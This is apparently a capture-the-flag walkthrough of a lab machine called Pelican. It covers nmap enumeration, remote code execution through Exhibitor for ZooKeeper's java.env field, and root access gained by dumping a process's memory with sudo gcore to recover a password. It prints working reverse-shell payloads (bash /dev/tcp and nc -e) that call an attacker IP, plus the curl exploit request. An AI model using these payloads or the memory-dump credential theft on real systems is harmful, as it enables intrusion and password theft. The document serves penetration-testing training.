TCP Ports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 10:21 +08
Nmap scan report for 192.168.113.98
Host is up (0.044s latency).
Not shown: 65526 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
631/tcp   open  ipp
2181/tcp  open  eforward
2222/tcp  open  EtherNetIP-1
8080/tcp  open  http-proxy
8081/tcp  open  blackice-icecap
39605/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 6.91 seconds

TCP Service Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 10:21 +08
Nmap scan report for 192.168.113.98
Host is up (0.039s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp   open  ipp         CUPS 2.2
|_http-server-header: CUPS/2.2 IPP/2.1
|_http-title: Forbidden - CUPS v2.2.10
| http-methods: 
|_  Potentially risky methods: PUT
2181/tcp  open  zookeeper   Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
8080/tcp  open  http        Jetty 1.0
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(1.0)
8081/tcp  open  http        nginx 1.14.2
|_http-title: Did not follow redirect to http://192.168.113.98:8080/exhibitor/v1/ui/index.html
|_http-server-header: nginx/1.14.2
39605/tcp open  java-rmi    Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2024-11-23T02:22:01
|_  start_date: N/A
|_clock-skew: mean: 1h40m00s, deviation: 2h53m14s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: pelican
|   NetBIOS computer name: PELICAN\x00
|   Domain name: \x00
|   FQDN: pelican
|_  System time: 2024-11-22T21:22:04-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.92 seconds

UDP Ports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 10:21 +08
Warning: 192.168.113.98 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.113.98
Host is up (0.040s latency).
Not shown: 65456 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT     STATE SERVICE
5353/udp open  zeroconf

Nmap done: 1 IP address (1 host up) scanned in 73.06 seconds

UDP Service Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 10:34 +08
Nmap scan report for 192.168.113.98
Host is up (0.040s latency).

PORT     STATE SERVICE VERSION
5353/udp open  mdns    DNS-based service discovery
| dns-service-discovery: 
|   445/tcp smb
|     Address=192.168.113.98
|   Device Information
|     model=MacSamba
|_    Address=192.168.113.98

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds

Port 8080

Port 8080 redirects to http://192.168.113.98:8080/exhibitor/v1/ui/index.html It is running something called Exhibitor for ZooKeeper.

Exploit

Searching on Google gave me an RCE exploit.

UI method

The method is very simple. I navigate to Config tab > turn on Editing > insert payload into java.env script field.

I then use a simple /bin/bash reverse shell command encased in either backticks or $().

```txt
$(/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.45.164/8888 0>&1")

or

`/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.45.164/8888 0>&1"`

After that, I simply click on Commit… > All At Once… and my nc listener will catch a shell.

cUrl method

There is also the cUrl method of doing the same.

curl -X POST -d @data.json http://192.168.179.98:8080/exhibitor/v1/config/set

data.json:

{ "zookeeperInstallDirectory": "/opt/zookeeper", "zookeeperDataDirectory": "/opt/zookeeper/snapshots", "zookeeperLogDirectory": "/opt/zookeeper/transactions", "logIndexDirectory": "/opt/zookeeper/transactions", "autoManageInstancesSettlingPeriodMs": "0", "autoManageInstancesFixedEnsembleSize": "0", "autoManageInstancesApplyAllAtOnce": "1", "observerThreshold": "0", "serversSpec": "1:exhibitor-demo", "javaEnvironment": "$(/bin/nc -e /bin/sh 192.168.45.164 8888 &)", "log4jProperties": "", "clientPort": "2181", "connectPort": "2888", "electionPort": "3888", "checkMs": "30000", "cleanupPeriodMs": "300000", "cleanupMaxFiles": "20", "backupPeriodMs": "600000", "backupMaxStoreMs": "21600000", "autoManageInstances": "1", "zooCfgExtra": { "tickTime": "2000", "initLimit": "10", "syncLimit": "5", "quorumListenOnAllIPs": "true" }, "backupExtra": { "directory": "" }, "serverId": 1 }

Note: the quotes get messed up when copied over from exploitdb. I had replaced them with the correct ones.

Success response message:

curl -X POST -d @data.json http://192.168.179.98:8080/exhibitor/v1/config/set
{"message":"OK","succeeded":true}

Shell as charles

nc listener catches a shell:

local.txt

charles@pelican:/opt/zookeeper$ cd ~
charles@pelican:~$ cat local.txt
aa90c48564480863bbfc0c39e0e2a2a7

sudo -l

charles@pelican:~$ sudo -l
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore

User charles can run /usr/bin/gcore as any user without password.

gcore

from gtfobins: It can be used to generate core dumps of running processes. Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named core.$PID, that is then often filtered with strings to narrow down relevant information.

sudo gcore $PID

SUID Binary

charles@pelican:~$ find / -perm /4000 2>/dev/null
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/ntfs-3g
/usr/bin/bwrap
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/password-store
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/umount
/usr/bin/pkexec

Looking at the sudoers file and then the SUID binaries are the first 2 favourite things I like to do when enumerating the target machine post-exploitation. Coincidentally, there is an SUID binary called password-store, which is just the binary that I’m looking for to find some passwords.

Reminder: SetUID allows users to run an executable with the permissions of the executable’s owner, typically granting elevated privileges.

Running Process: password-store

charles@pelican:~$ ps aux | grep password
root       513  0.0  0.0   2276    72 ?        Ss   16:11   0:00 /usr/bin/password-store
charles   5428  0.0  0.0   6208   820 pts/0    S+   16:29   0:00 grep password

We find that password-store has a running process with the PID of 513.

core.513

charles@pelican:~$ sudo gcore 513
0x00007f971bd1c6f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffc3d7a2c80, remaining=remaining@entry=0x7ffc3d7a2c80) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28      ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.513
[Inferior 1 (process 513) detached]
charles@pelican:~$ ls
core.513  local.txt

After running sudo gcore 513, we find the core.513 binary file as mentioned by the explanation in gcore containing the core dumps of the password-store binary.

Examining core.513

When performing the strings command on core.513, there are many lines to look at so I decided to grep for root.

charles@pelican:~$ strings core.513 | grep root
001 Password: root:
HOME=/root
LOGNAME=root
PWD=/root

We see a line containing root and password so I will adjust the grep pattern to look particularly at that line as well as 5 lines before and after it.

charles@pelican:~$ strings core.513 | grep "Password: root:" -B5 -A5
////////////////
`,z=
@-z=
@-z=
 -z=
001 Password: root:
ClogKingpinInning731
E?z=
]?z=
h?z=
u?z=

Right below the line we grepped, we find the root password. ClogKingpinInning731

proof.txt

charles@pelican:~$ su root
Password: ClogKingpinInning731

root@pelican:/home/charles# cd /root
root@pelican:~# ls
Desktop    Downloads  Pictures   Public     Videos
Documents  Music      proof.txt  Templates
root@pelican:~# cat proof.txt
3046c2fca5045c608b2392701417cdaa

TCP Ports#

TCP Service Scan#

UDP Ports#

UDP Service Scan#

Port 8080#

Exploit#

UI method#

cUrl method#

Shell as charles#

local.txt#

sudo -l#

gcore#

SUID Binary#

Running Process: password-store#

core.513#

Examining core.513#

proof.txt#